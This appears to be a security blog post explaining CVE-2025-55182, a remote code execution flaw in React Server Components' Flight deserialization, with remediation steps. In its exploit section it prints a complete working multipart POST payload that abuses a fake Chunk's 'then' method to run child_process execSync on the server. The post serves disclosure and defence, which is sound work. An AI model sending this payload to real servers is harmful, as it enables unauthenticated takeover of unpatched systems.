Dec 23 , 2025 | Research & Tutorials

React Server Components (RSC) promise less client-side JavaScript, but that convenience can hide serious risk. On December 3rd 2025, the React team published a disclosure describing CVE-2025-55182, a critical Remote Code Execution (RCE) vulnerability in the RSC ecosystem.

The vulnerability received a maximum CVSS score of 10.0. That score is reserved for vulnerabilities that require no authentication, no user interaction, and have a direct path to remote code execution.

Understanding the Vulnerability

React Server Components communicate with the server using a protocol called Flight. The problem lies in how the server parses incoming payloads. Certain versions of RSC packages trust received data too much. Instead of validating structure, the server attempts to deserialize anything the user sends.

The root issue is unsafe deserialization. RSC relies on special internal objects called "Chunks". Vulnerable versions allow an attacker to craft a fake Chunk object. Since React does not validate the payload, it treats the fake object as genuine, giving the attacker control over internal parsing states and allowing execution of arbitrary JavaScript on the server.

How the Public PoC Works

The proof of concept uses logic abuse built on top of expected JavaScript features:

  • The attacker submits a Flight payload containing a crafted object that looks like a Chunk.
  • The fake Chunk defines a custom then method.
  • When React deserializes the payload, it attempts to resolve the Chunk as a promise.
  • This triggers the attacker-controlled then method.
  • The attacker modifies the internal _response object to call server-side functions (gadgets) chosen by them.

The Exploit Payload

The attacker only needs to send an HTTP POST request to the RSC endpoint. No account or CSRF token is required. Below is an example payload that creates a file in the /tmp directory to verify execution:

POST / HTTP/1.1
Host: 192.168.120.206
User-Agent: Mozilla/5.0 ... Chrome/142.0.0.0 Safari/537.36
Next-Action: x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 467

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"process.mainModule.require('child_process').execSync('touch /tmp/rce_poc');","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--

Impact & Remediation

This vulnerability affects any environment using React Server Components versions 19.0, 19.1.0, 19.1.1, and 19.2.0. This includes apps that do not explicitly define server functions.

What you must do immediately:

  • Upgrade: Update to the patched versions immediately.
  • Check Dependencies: Even if you didn't install react-server-dom-* directly, your framework might have.
  • WAF: Enable WAF mitigation if you cannot patch immediately.
  • Incident Response: Treat exposed RSC endpoints as potentially compromised if they were running a vulnerable version.
Tags: CVE-2025-55182 React RCE Exploit